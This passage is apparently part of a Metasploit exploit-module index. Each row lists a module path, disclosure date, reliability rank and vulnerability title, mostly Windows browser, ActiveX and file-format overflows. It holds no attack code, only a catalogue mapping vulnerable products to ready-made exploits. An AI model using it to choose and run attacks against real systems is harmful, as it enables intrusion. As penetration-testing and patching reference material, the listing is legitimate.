Execution Vulnerability + 975 windows/browser/logitechvideocall_start 2007-05-31 normal No Logitech VideoCall ActiveX Control Buffer Overflow + 976 windows/browser/lpviewer_url 2008-10-06 normal No iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow + 977 windows/browser/macrovision_downloadandexecute 2007-10-31 normal No Macrovision InstallShield Update Service Buffer Overflow + 978 windows/browser/macrovision_unsafe 2007-10-20 excellent No Macrovision InstallShield Update Service ActiveX Unsafe Method + 979 windows/browser/malwarebytes_update_exec 2014-12-16 good No Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution + 980 windows/browser/maxthon_history_xcs 2012-11-26 excellent No Maxthon3 about:history XCS Trusted Zone Code Execution + 981 windows/browser/mcafee_mcsubmgr_vsprintf 2006-08-01 normal No McAfee Subscription Manager Stack Buffer Overflow + 982 windows/browser/mcafee_mvt_exec 2012-04-30 excellent No McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability + 983 windows/browser/mcafeevisualtrace_tracetarget 2007-07-07 normal No McAfee Visual Trace ActiveX Control Buffer Overflow + 984 windows/browser/mirc_irc_url 2003-10-13 normal No mIRC IRC URL Buffer Overflow + 985 windows/browser/mozilla_attribchildremoved 2011-12-06 average No Firefox 8/9 AttributeChildRemoved() Use-After-Free + 986 windows/browser/mozilla_firefox_onreadystatechange 2013-06-25 normal No Firefox onreadystatechange Event DocumentViewerImpl Use After Free + 987 windows/browser/mozilla_firefox_xmlserializer 2013-01-08 normal No Firefox XMLSerializer Use After Free + 988 windows/browser/mozilla_interleaved_write 2010-10-25 normal No Mozilla Firefox Interleaved document.write/appendChild Memory Corruption + 989 windows/browser/mozilla_mchannel 2011-05-10 normal No Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability + 990 windows/browser/mozilla_nssvgvalue 2011-12-06 average No Firefox nsSVGValue Out-of-Bounds Access Vulnerability + 991 windows/browser/mozilla_nstreerange 2011-02-02 normal No Mozilla Firefox "nsTreeRange" Dangling Pointer Vulnerability + 992 windows/browser/mozilla_reduceright 2011-06-21 normal No Mozilla Firefox Array.reduceRight() Integer Overflow + 993 windows/browser/ms03_020_ie_objecttype 2003-06-04 normal No MS03-020 Microsoft Internet Explorer Object Type + 994 windows/browser/ms05_054_onload 2005-11-21 normal No MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution + 995 windows/browser/ms06_001_wmf_setabortproc 2005-12-27 great No Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution + 996 windows/browser/ms06_013_createtextrange 2006-03-19 normal No MS06-013 Microsoft Internet Explorer createTextRange() Code Execution + 997 windows/browser/ms06_055_vml_method 2006-09-19 normal No MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution + 998 windows/browser/ms06_057_webview_setslice 2006-07-17 normal No MS06-057 Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow + 999 windows/browser/ms06_067_keyframe 2006-11-14 normal No MS06-067 Microsoft Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability + 1000 windows/browser/ms06_071_xml_core 2006-10-10 normal No MS06-071 Microsoft Internet Explorer XML Core Services HTTP Request Handling + 1001 windows/browser/ms07_017_ani_loadimage_chunksize 2007-03-28 great No Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) + 1002 windows/browser/ms08_041_snapshotviewer 2008-07-07 excellent No Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download + 1003 windows/browser/ms08_053_mediaencoder 2008-09-09 normal No Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow + 1004 windows/browser/ms08_070_visual_studio_msmask 2008-08-13 normal No Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow + 1005 windows/browser/ms08_078_xml_corruption 2008-12-07 normal No MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption + 1006 windows/browser/ms09_002_memory_corruption 2009-02-10 normal No MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption + 1007 windows/browser/ms09_043_owc_htmlurl 2009-08-11 normal No Microsoft OWC Spreadsheet HTMLURL Buffer Overflow + 1008 windows/browser/ms09_043_owc_msdso 2009-07-13 normal No Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption + 1009 windows/browser/ms09_072_style_object 2009-11-20 normal No MS09-072 Microsoft Internet Explorer Style getElementsByTagName Memory Corruption + 1010 windows/browser/ms10_002_aurora 2010-01-14 normal No MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption + 1011 windows/browser/ms10_002_ie_object 2010-01-21 normal No MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free + 1012 windows/browser/ms10_018_ie_behaviors 2010-03-09 good No MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free + 1013 windows/browser/ms10_018_ie_tabular_activex 2010-03-09 good No MS10-018 Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption + 1014 windows/browser/ms10_022_ie_vbscript_winhlp32 2010-02-26 great No MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution + 1015 windows/browser/ms10_026_avi_nsamplespersec 2010-04-13 normal No MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow + 1016 windows/browser/ms10_042_helpctr_xss_cmd_exec 2010-06-09 excellent No Microsoft Help Center XSS and Command Execution + 1017 windows/browser/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent No Microsoft Windows Shell LNK Code Execution + 1018 windows/browser/ms10_090_ie_css_clip 2010-11-03 good No MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption + 1019 windows/browser/ms11_003_ie_css_import 2010-11-29 good No MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free + 1020 windows/browser/ms11_050_mshtml_cobjectelement 2011-06-16 normal No MS11-050 IE mshtml!CObjectElement Use After Free + 1021 windows/browser/ms11_081_option 2012-10-11 normal No MS11-081 Microsoft Internet Explorer Option Element Use-After-Free + 1022 windows/browser/ms11_093_ole32 2011-12-13 normal No MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution + 1023 windows/browser/ms12_004_midi 2012-01-10 normal No MS12-004 midiOutPlayNextPolyEvent Heap Overflow + 1024 windows/browser/ms12_037_ie_colspan 2012-06-12 normal No MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow + 1025 windows/browser/ms12_037_same_id 2012-06-12 normal No MS12-037 Microsoft Internet Explorer Same ID Property Deleted Object Handling Memory Corruption + 1026 windows/browser/ms13_009_ie_slayoutrun_uaf 2013-02-13 average No MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free + 1027 windows/browser/ms13_022_silverlight_script_object 2013-03-12 normal No MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access + 1028 windows/browser/ms13_037_svg_dashstyle 2013-03-06 normal No MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow + 1029 windows/browser/ms13_055_canchor 2013-07-09 normal No MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free + 1030 windows/browser/ms13_059_cflatmarkuppointer 2013-06-27 normal No MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free + 1031 windows/browser/ms13_069_caret 2013-09-10 normal No MS13-069 Microsoft Internet Explorer CCaret Use-After-Free + 1032 windows/browser/ms13_080_cdisplaypointer 2013-10-08 normal No MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free + 1033 windows/browser/ms13_090_cardspacesigninhelper 2013-11-08 normal No MS13-090 CardSpaceClaimCollection ActiveX Integer Underflow + 1034 windows/browser/ms14_012_cmarkup_uaf 2014-02-13 normal No MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free + 1035 windows/browser/ms14_012_textrange 2014-03-11 normal No MS14-012 Microsoft Internet Explorer TextRange Use-After-Free + 1036 windows/browser/ms14_064_ole_code_execution 2014-11-13 good No MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution + 1037 windows/browser/ms16_051_vbscript 2016-05-10 normal No Internet Explorer 11 VBScript Engine Memory Corruption + 1038 windows/browser/msvidctl_mpeg2 2009-07-05 normal No Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption + 1039 windows/browser/mswhale_checkforupdates 2009-04-15 normal No Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow + 1040 windows/browser/msxml_get_definition_code_exec 2012-06-12 good No MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption + 1041 windows/browser/nctaudiofile2_setformatlikesample 2007-01-24 normal No NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow + 1042 windows/browser/nis2004_antispam 2004-03-19 normal No Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow + 1043 windows/browser/nis2004_get 2007-05-16 normal No Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow + 1044 windows/browser/notes_handler_cmdinject 2012-06-18 excellent No IBM Lotus Notes Client URL Handler Command Injection + 1045 windows/browser/novell_groupwise_gwcls1_actvx 2013-01-30 normal No Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution + 1046 windows/browser/novelliprint_callbackurl 2010-08-20 normal No Novell iPrint Client ActiveX Control call-back-url Buffer Overflow + 1047 windows/browser/novelliprint_datetime 2009-12-08 great No Novell iPrint Client ActiveX Control Date/Time Buffer Overflow + 1048 windows/browser/novelliprint_executerequest 2008-02-22 normal No Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow + 1049 windows/browser/novelliprint_executerequest_dbg 2010-08-04 normal No Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow + 1050 windows/browser/novelliprint_getdriversettings 2008-06-16 normal No Novell iPrint Client ActiveX Control Buffer Overflow + 1051 windows/browser/novelliprint_getdriversettings_2 2010-11-15 normal No Novell iPrint Client ActiveX Control Buffer Overflow + 1052 windows/browser/novelliprint_target_frame 2009-12-08 great No Novell iPrint Client ActiveX Control target-frame Buffer Overflow + 1053 windows/browser/ntr_activex_check_bof 2012-01-11 normal No NTR ActiveX Control Check() Method Buffer Overflow + 1054 windows/browser/ntr_activex_stopmodule 2012-01-11 normal No NTR ActiveX Control StopModule() Remote Code Execution + 1055 windows/browser/oracle_autovue_setmarkupmode 2012-04-18 normal No Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow + 1056 windows/browser/oracle_dc_submittoexpress 2009-08-28 normal No Oracle Document Capture 10g ActiveX Control Buffer Overflow + 1057 windows/browser/oracle_webcenter_checkoutandopen 2013-04-16 excellent No Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution + 1058 windows/browser/orbit_connecting 2009-02-03 normal No Orbit Downloader Connecting Log Creation Buffer Overflow + 1059 windows/browser/ovftool_format_string 2012-11-08 normal No VMWare OVF Tools Format String Vulnerability + 1060 windows/browser/pcvue_func 2011-10-05 average No PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability + 1061 windows/browser/persits_xupload_traversal 2009-09-29 excellent No Persits XUpload ActiveX MakeHttpRequest Directory Traversal + 1062 windows/browser/quickr_qp2_bof 2012-05-23 normal No IBM Lotus QuickR qp2 ActiveX Buffer Overflow + 1063 windows/browser/real_arcade_installerdlg 2011-04-03 normal No Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution + 1064 windows/browser/realplayer_cdda_uri 2010-11-15 normal No RealNetworks RealPlayer CDDA URI Initialization Vulnerability + 1065 windows/browser/realplayer_console 2008-03-08 normal No RealPlayer rmoc3260.dll ActiveX Control Heap Corruption + 1066 windows/browser/realplayer_import 2007-10-18 normal No RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow + 1067 windows/browser/realplayer_qcp 2011-08-16 average No RealNetworks Realplayer QCP Parsing Heap Overflow + 1068 windows/browser/realplayer_smil 2005-03-01 normal No RealNetworks RealPlayer SMIL Buffer Overflow + 1069 windows/browser/roxio_cineplayer 2007-04-11 normal No Roxio CinePlayer ActiveX Control Buffer Overflow + 1070 windows/browser/safari_xslt_output 2011-07-20 excellent No Apple Safari Webkit libxslt Arbitrary File Creation + 1071 windows/browser/samsung_neti_wiewer_backuptoavi_bof 2012-04-21 normal No Samsung NET-i Viewer Multiple ActiveX BackupToAvi() Remote Overflow + 1072 windows/browser/samsung_security_manager_put 2016-08-05 excellent No Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution + 1073 windows/browser/sapgui_saveviewtosessionfile 2009-03-31 normal No SAP AG SAPgui EAI WebViewer3D Buffer Overflow + 1074 windows/browser/siemens_solid_edge_selistctrlx 2013-05-26 normal No Siemens Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution + 1075 windows/browser/softartisans_getdrivename 2008-08-25 normal No SoftArtisans XFile FileManager ActiveX Control Buffer Overflow + 1076 windows/browser/sonicwall_addrouteentry 2007-11-01 normal No SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow + 1077 windows/browser/symantec_altirisdeployment_downloadandinstall 2009-09-09 excellent No Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute + 1078 windows/browser/symantec_altirisdeployment_runcmd 2009-11-04 normal No Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow + 1079 windows/browser/symantec_appstream_unsafe 2009-01-15 excellent No Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute + 1080 windows/browser/symantec_backupexec_pvcalendar 2008-02-28 normal No Symantec BackupExec Calendar Control Buffer Overflow + 1081 windows/browser/symantec_consoleutilities_browseandsavefile 2009-11-02 normal No Symantec ConsoleUtilities ActiveX Control Buffer Overflow + 1082 windows/browser/synactis_connecttosynactis_bof 2013-05-30 normal No Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow + 1083 windows/browser/systemrequirementslab_unsafe 2008-10-16 excellent No Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method + 1084 windows/browser/teechart_pro 2011-08-11 normal No TeeChart Professional ActiveX Control Trusted Integer Dereference + 1085 windows/browser/tom_sawyer_tsgetx71ex552 2011-05-03 normal No Tom Sawyer Software GET Extension Factory Remote Code Execution + 1086 windows/browser/trendmicro_extsetowner 2010-08-25 normal No Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution + 1087 windows/browser/trendmicro_officescan 2007-02-12 normal No Trend Micro OfficeScan Client ActiveX Control Buffer Overflow + 1088 windows/browser/tumbleweed_filetransfer 2008-04-07 great No Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow + 1089 windows/browser/ubisoft_uplay_cmd_exec 2012-07-29 normal No Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution + 1090 windows/browser/ultramjcam_openfiledig_bof 2012-03-28 normal No TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow + 1091 windows/browser/ultraoffice_httpupload 2008-08-27 good No Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow + 1092 windows/browser/verypdf_pdfview 2008-06-16 normal No VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow + 1093 windows/browser/viscom_movieplayer_drawtext 2010-01-12 normal No Viscom Software Movie Player Pro SDK ActiveX 6.8 + 1094 windows/browser/vlc_amv 2011-03-23 good No VLC AMV Dangling Pointer Vulnerability + 1095 windows/browser/vlc_mms_bof 2012-03-15 normal No VLC MMS Stream Handling Buffer Overflow + 1096 windows/browser/webdav_dll_hijacker 2010-08-18 manual No WebDAV Application DLL Hijacker + 1097 windows/browser/webex_ucf_newobject 2008-08-06 good No WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow + 1098 windows/browser/wellintech_kingscada_kxclientdownload 2014-01-14 good No KingScada kxClientDownload.ocx ActiveX Remote Code Execution + 1099 windows/browser/winamp_playlist_unc 2006-01-29 great No Winamp Playlist UNC Path Computer Name Overflow + 1100 windows/browser/winamp_ultravox 2008-01-18 normal No Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow + 1101 windows/browser/windvd7_applicationtype 2007-03-20 normal No WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow + 1102 windows/browser/winzip_fileview 2007-11-02 normal No WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow + 1103 windows/browser/wmi_admintools 2010-12-21 great No Microsoft WMI Administration Tools ActiveX Buffer Overflow + 1104 windows/browser/x360_video_player_set_text_bof 2015-01-30 normal No X360 VideoPlayer ActiveX Control Buffer Overflow + 1105 windows/browser/xmplay_asx 2006-11-21 good No XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow + 1106 windows/browser/yahoomessenger_fvcom 2007-08-30 normal No Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow + 1107 windows/browser/yahoomessenger_server 2007-06-05 good No Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow + 1108 windows/browser/zenturiprogramchecker_unsafe 2007-05-29 excellent No Zenturi ProgramChecker ActiveX Control Arbitrary File Download + 1109 windows/browser/zenworks_helplauncher_exec 2011-10-19 normal No AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution + 1110 windows/dcerpc/ms03_026_dcom 2003-07-16 great No MS03-026 Microsoft RPC DCOM Interface Overflow + 1111 windows/dcerpc/ms05_017_msmq 2005-04-12 good No MS05-017 Microsoft Message Queueing Service Path Overflow + 1112 windows/dcerpc/ms07_029_msdns_zonename 2007-04-12 great No MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP) + 1113 windows/dcerpc/ms07_065_msmq 2007-12-11 good No MS07-065 Microsoft Message Queueing Service DNS Name Path Overflow + 1114 windows/email/ms07_017_ani_loadimage_chunksize 2007-03-28 great No Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) + 1115 windows/email/ms10_045_outlook_ref_only 2010-06-01 excellent No Outlook ATTACH_BY_REF_ONLY File Execution + 1116 windows/email/ms10_045_outlook_ref_resolve 2010-06-01 excellent No Outlook ATTACH_BY_REF_RESOLVE File Execution + 1117 windows/emc/alphastor_agent 2008-05-27 great No EMC AlphaStor Agent Buffer Overflow + 1118 windows/emc/alphastor_device_manager_exec 2013-01-18 excellent Yes EMC AlphaStor Device Manager Opcode 0x75 Command Injection + 1119 windows/emc/networker_format_string 2012-08-29 normal No EMC Networker Format String + 1120 windows/emc/replication_manager_exec 2011-02-07 great No EMC Replication Manager Command Execution + 1121 windows/fileformat/a_pdf_wav_to_mp3 2010-08-17 normal No A-PDF WAV to MP3 v1.0.0 Buffer Overflow + 1122 windows/fileformat/abbs_amp_lst 2013-06-30 normal No ABBS Audio Media Player .LST Buffer Overflow + 1123 windows/fileformat/acdsee_fotoslate_string 2011-09-12 good No ACDSee FotoSlate PLP File id Parameter Overflow + 1124 windows/fileformat/acdsee_xpm 2007-11-23 good No ACDSee XPM File Section Buffer Overflow + 1125 windows/fileformat/actfax_import_users_bof 2012-08-28 normal No ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow + 1126 windows/fileformat/activepdf_webgrabber 2008-08-26 low No activePDF WebGrabber ActiveX Control Buffer Overflow + 1127 windows/fileformat/adobe_collectemailinfo 2008-02-08 good No Adobe Collab.collectEmailInfo() Buffer Overflow + 1128 windows/fileformat/adobe_cooltype_sing 2010-09-07 great No Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow + 1129 windows/fileformat/adobe_flashplayer_button 2010-10-28 normal No Adobe Flash Player "Button" Remote Code Execution + 1130 windows/fileformat/adobe_flashplayer_newfunction 2010-06-04 normal No Adobe Flash Player "newfunction" Invalid Pointer Use + 1131 windows/fileformat/adobe_flatedecode_predictor02 2009-10-08 good No Adobe FlateDecode Stream Predictor 02 Integer Overflow + 1132 windows/fileformat/adobe_geticon 2009-03-24 good No Adobe Collab.getIcon() Buffer Overflow + 1133 windows/fileformat/adobe_illustrator_v14_eps 2009-12-03 great No Adobe Illustrator CS4 v14.0.0 + 1134 windows/fileformat/adobe_jbig2decode 2009-02-19 good No Adobe JBIG2Decode Memory Corruption + 1135 windows/fileformat/adobe_libtiff 2010-02-16 good No Adobe Acrobat Bundled LibTIFF Integer Overflow + 1136 windows/fileformat/adobe_media_newplayer 2009-12-14 good No Adobe Doc.media.newPlayer Use After Free Vulnerability + 1137 windows/fileformat/adobe_pdf_embedded_exe 2010-03-29 excellent No Adobe PDF Embedded EXE Social Engineering + 1138 windows/fileformat/adobe_pdf_embedded_exe_nojs 2010-03-29 excellent No Adobe PDF Escape EXE Social Engineering (No JavaScript) + 1139 windows/fileformat/adobe_reader_u3d 2011-12-06 average No Adobe Reader U3D Memory Corruption Vulnerability + 1140 windows/fileformat/adobe_toolbutton 2013-08-08 normal No Adobe Reader ToolButton Use After Free + 1141 windows/fileformat/adobe_u3d_meshdecl 2009-10-13 good No Adobe U3D CLODProgressiveMeshDeclaration Array Overrun + 1142 windows/fileformat/adobe_utilprintf 2008-02-08 good No Adobe util.printf() Buffer Overflow + 1143 windows/fileformat/allplayer_m3u_bof 2013-10-09 normal No ALLPlayer M3U Buffer Overflow + 1144 windows/fileformat/altap_salamander_pdb 2007-06-19 good No Altap Salamander 2.5 PE Viewer Buffer Overflow + 1145 windows/fileformat/aol_desktop_linktag 2011-01-31 normal No AOL Desktop 9.6 RTX Buffer Overflow + 1146 windows/fileformat/aol_phobos_bof 2010-01-20 average No AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow + 1147 windows/fileformat/apple_quicktime_pnsize 2011-08-08 good No Apple QuickTime PICT PnSize Buffer Overflow + 1148 windows/fileformat/apple_quicktime_rdrf 2013-05-22 normal No Apple Quicktime 7 Invalid Atom Length Buffer Overflow + 1149 windows/fileformat/apple_quicktime_texml 2012-05-15 normal No Apple QuickTime TeXML Style Element Stack Buffer Overflow + 1150 windows/fileformat/audio_coder_m3u 2013-05-01 normal No AudioCoder .M3U Buffer Overflow + 1151 windows/fileformat/audio_wkstn_pls 2009-12-08 good No Audio Workstation 6.4.2.4.3 pls Buffer Overflow + 1152 windows/fileformat/audiotran_pls 2010-01-09 good No Audiotran 1.4.1 (PLS File) Stack Buffer Overflow + 1153 windows/fileformat/audiotran_pls_1424 2010-09-09 good No Audiotran PLS File Stack Buffer Overflow + 1154 windows/fileformat/aviosoft_plf_buf 2011-11-09 good No Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow + 1155 windows/fileformat/bacnet_csv 2010-09-16 good No BACnet OPC Client Buffer Overflow + 1156 windows/fileformat/beetel_netconfig_ini_bof 2013-10-12 normal No Beetel Connection Manager NetConfig.ini Buffer Overflow + 1157 windows/fileformat/blazedvd_hdtv_bof 2012-04-03 normal No BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability + 1158 windows/fileformat/blazedvd_plf 2009-08-03 good No BlazeDVD 6.1 PLF Buffer Overflow + 1159 windows/fileformat/boxoft_wav_to_mp3 2015-08-31 normal No Boxoft WAV to MP3 Converter v1.1 Buffer Overflow + 1160 windows/fileformat/bpftp_client_bps_bof 2014-07-24 normal No BulletProof FTP Client BPS Buffer Overflow + 1161 windows/fileformat/bsplayer_m3u 2010-01-07 normal No BS.Player 2.57 Buffer Overflow (Unicode SEH) + 1162 windows/fileformat/ca_cab 2007-06-05 good No CA Antivirus Engine CAB Buffer Overflow + 1163 windows/fileformat/cain_abel_4918_rdp 2008-11-30 good No Cain and Abel RDP Buffer Overflow + 1164 windows/fileformat/ccmplayer_m3u_bof 2011-11-30 good No CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow + 1165 windows/fileformat/chasys_draw_ies_bmp_bof 2013-07-26 normal No Chasys Draw IES Buffer Overflow + 1166 windows/fileformat/coolpdf_image_stream_bof 2013-01-18 normal No Cool PDF Image Stream Buffer Overflow + 1167 windows/fileformat/corelpdf_fusion_bof 2013-07-08 normal No Corel PDF Fusion Stack Buffer Overflow + 1168 windows/fileformat/csound_getnum_bof 2012-02-23 normal No Csound hetro File Handling Stack Buffer Overflow + 1169 windows/fileformat/cutezip_bof 2011-02-12 normal No GlobalSCAPE CuteZIP Stack Buffer Overflow + 1170 windows/fileformat/cve_2017_8464_lnk_rce 2017-06-13 excellent No LNK Code Execution Vulnerability + 1171 windows/fileformat/cyberlink_lpp_bof 2017-09-23 normal No CyberLink LabelPrint 2.5 Stack Buffer Overflow + 1172 windows/fileformat/cyberlink_p2g_bof 2011-09-12 great No CyberLink Power2Go name Attribute (p2g) Stack Buffer Overflow Exploit + 1173 windows/fileformat/cytel_studio_cy3 2011-10-02 good No Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow + 1174 windows/fileformat/deepburner_path 2006-12-19 great No AstonSoft DeepBurner (DBR File) Path Buffer Overflow + 1175 windows/fileformat/destinymediaplayer16 2009-01-03 good No Destiny Media Player 1.61 PLS M3U Buffer Overflow + 1176 windows/fileformat/digital_music_pad_pls 2010-09-17 normal No Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow + 1177 windows/fileformat/djstudio_pls_bof 2009-12-30 normal No DJ Studio Pro 5.1 .pls Stack Buffer Overflow + 1178 windows/fileformat/djvu_imageurl 2008-10-30 low No DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow + 1179 windows/fileformat/dupscout_xml 2017-03-29 normal No Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow + 1180 windows/fileformat/dvdx_plf_bof 2007-06-02 normal No DVD X Player 5.5 .plf PlayList Buffer Overflow + 1181 windows/fileformat/easycdda_pls_bof 2010-06-07 normal No Easy CD-DA Recorder PLS Buffer Overflow + 1182 windows/fileformat/emc_appextender_keyworks 2009-09-29 average No EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow + 1183 windows/fileformat/erdas_er_viewer_bof 2013-04-23 normal No ERS Viewer 2011 ERS File Handling Buffer Overflow + 1184 windows/fileformat/erdas_er_viewer_rf_report_error 2013-05-23 normal No ERS Viewer 2013 ERS File Handling Buffer Overflow + 1185 windows/fileformat/esignal_styletemplate_bof 2011-09-06 normal No eSignal and eSignal Pro File Parsing Buffer Overflow in QUO + 1186 windows/fileformat/etrust_pestscan 2009-11-02 average No CA eTrust PestPatrol ActiveX Control Buffer Overflow + 1187 windows/fileformat/ezip_wizard_bof 2009-03-09 good No eZip Wizard 3.0 Stack Buffer Overflow + 1188 windows/fileformat/fatplayer_wav 2010-10-18 normal No Fat Player Media Player 0.6b0 Buffer Overflow + 1189 windows/fileformat/fdm_torrent 2009-02-02 good No Free Download Manager Torrent Parsing Buffer Overflow + 1190 windows/fileformat/feeddemon_opml 2009-02-09 great No FeedDemon Stack Buffer Overflow + 1191 windows/fileformat/foxit_reader_filewrite 2011-03-05 normal No Foxit PDF Reader 4.2 Javascript File Write + 1192 windows/fileformat/foxit_reader_launch 2009-03-09 good No Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow + 1193 windows/fileformat/foxit_reader_uaf 2018-04-20 normal No Foxit PDF Reader Pointer Overwrite UAF + 1194 windows/fileformat/foxit_title_bof 2010-11-13 great No Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow + 1195 windows/fileformat/free_mp3_ripper_wav 2011-08-27 great No Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow + 1196 windows/fileformat/galan_fileformat_bof 2009-12-07 normal No gAlan 0.2.1 Buffer Overflow + 1197 windows/fileformat/gsm_sim 2010-07-07 normal No GSM SIM Editor 5.15 Buffer Overflow + 1198 windows/fileformat/gta_samp 2011-09-18 normal No GTA SA-MP server.cfg Buffer Overflow + 1199 windows/fileformat/hhw_hhp_compiledfile_bof 2006-02-06 good No HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow + 1200 windows/fileformat/hhw_hhp_contentfile_bof 2006-02-06 good No HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow + 1201 windows/fileformat/hhw_hhp_indexfile_bof 2009-01-17 good No HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow + 1202 windows/fileformat/homm3_h3m 2015-07-29 normal No Heroes of Might and Magic III .h3m Map file Buffer Overflow + 1203 windows/fileformat/ht_mp3player_ht3_bof 2009-06-29 good No HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow + 1204 windows/fileformat/ibm_forms_viewer_fontname 2013-12-05 normal No IBM Forms Viewer Unicode Buffer Overflow + 1205 windows/fileformat/ibm_pcm_ws 2012-02-28 great No IBM Personal Communications iSeries Access WorkStation 5.9 Profile + 1206 windows/fileformat/icofx_bof 2013-12-10 normal No IcoFX Stack Buffer Overflow + 1207 windows/fileformat/ideal_migration_ipj 2009-12-05 great No PointDev IDEAL Migration Buffer Overflow + 1208 windows/fileformat/iftp_schedule_bof 2014-11-06 normal No i-FTP Schedule Buffer Overflow + 1209 windows/fileformat/irfanview_jpeg2000_bof 2012-01-16 normal No Irfanview JPEG2000 jp2 Stack Buffer Overflow + 1210 windows/fileformat/ispvm_xcf_ispxcf 2012-05-16 normal No Lattice Semiconductor ispVM System XCF File Handling Overflow + 1211 windows/fileformat/kingview_kingmess_kvl 2012-11-20 normal No KingView Log File Parsing Buffer Overflow + 1212 windows/fileformat/lattice_pac_bof 2012-05-16 normal No Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow + 1213 windows/fileformat/lotusnotes_lzh 2011-05-24 good No Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment) + 1214 windows/fileformat/magix_musikmaker_16_mmm 2011-04-26 good No Magix Musik Maker 16 .mmm Stack Buffer Overflow + 1215 windows/fileformat/mcafee_hercules_deletesnapshot 2008-08-04 low No McAfee Remediation Client ActiveX Control Buffer Overflow + 1216 windows/fileformat/mcafee_showreport_exec 2012-01-12 normal No McAfee SaaS MyCioScan 